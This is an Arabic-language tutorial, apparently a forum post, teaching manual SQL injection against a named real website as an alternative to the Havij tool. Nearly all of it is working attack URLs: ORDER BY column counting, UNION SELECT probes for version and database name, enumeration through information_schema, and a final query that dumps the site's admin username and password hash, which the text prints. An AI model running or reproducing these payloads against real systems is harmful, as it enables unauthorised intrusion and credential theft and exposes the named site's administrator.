درس إحترافي في SQL يدوي في حالة إيجاد صعوبة في Havij

أهلاً اليوم درسنا MANUAL SQL INJECTION يعني SQL  يدوي  بدون havij :
أنا وجدت موقع مصاب . أضف ' للتاكد. تمام

ألان نحاول  إيجاد  عدد الأعمدة وذلك بإضافة "order+by+رقم عشواي حتى يظهر الخطا"
فالنبدا .

ظهر الخطا في رقم 10 إذاً عدد الأعمدة 9. إذن سيكون الموقع هكذا : 
http://arabexperts.me/details_article_old.php?id=294+order+by+9
ألان إكتب "union+select+عدد الأعمدة مترابطة " هكذا : 
union+select+1,2,3,4,5,6,7,8,9
ليكون الموقع هكذا :
http://arabexperts.me/details_article_old.php?id=294+union+select+1,2,3,4,5,6,7,8,9
ظهر لنا رقم (عادةً يظهر رقم واحد لكن هذا خطا من الموقع) وهذا الرقم هو : 2
إذن فالعمود رقم 2 إكتب version() لمعرفة نوع الموقع 

http://arabexperts.me/details_article_old.php?id=294+union+select+1,version(),3,4,5,6,7,8,9
5.0.91
ثم إكتب database() لمعرفة إسم الdatabase

http://arabexperts.me/details_article_old.php?id=294+union+select+1,database(),3,4,5,6,7,8,9
arabexp1_experts 
ألان إكتب table_name وأضف للموقع هذا : 
+from+information_schema.tables--
ليكون الموقع هكذا :
http://arabexperts.me/details_article_old.php?id=294+union+select+1,table_name,3,4,5,6,7,8,9+from+information_schema.tables--
رائع ألان اعطانا الأعمدة .
ألان ابحث عن عمود يكون إسمه قريباً من أدمن ك(admin،users،members،administrator.....)
رائع وجدت العمود users
ألان نستخرج أعمدة هذا العمود وذلك بإضافة column_name للعمود 2 وإضافة هذا :
+from%20information_schema.columns%20WHERE%20table_name=char(117,115,101,114,115)--
117,115,101,114,115 : users
يمكنكم تبديلها إن هنا :
http://getyourwebsitehere.com/jswb/text_to_ascii.html 
إنظر ....
رائع وجدنا الأعمدة
نحن نحتاج الأدمين والباسورد إذن الأعمدة هي : username و password
إذن أضف للعمود 2 : concat(username,0x3a,password)
و+from+users--
users: إسم العمود 
ليكون الموقع هكذا :
http://arabexperts.me/details_article_old.php?id=294+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9+from+users--

Admin:582301962f863541fdcefd744296f8b4 
شكراً
درس من ahmdosa http://www.facebook.com/profile.php?id=100002460215113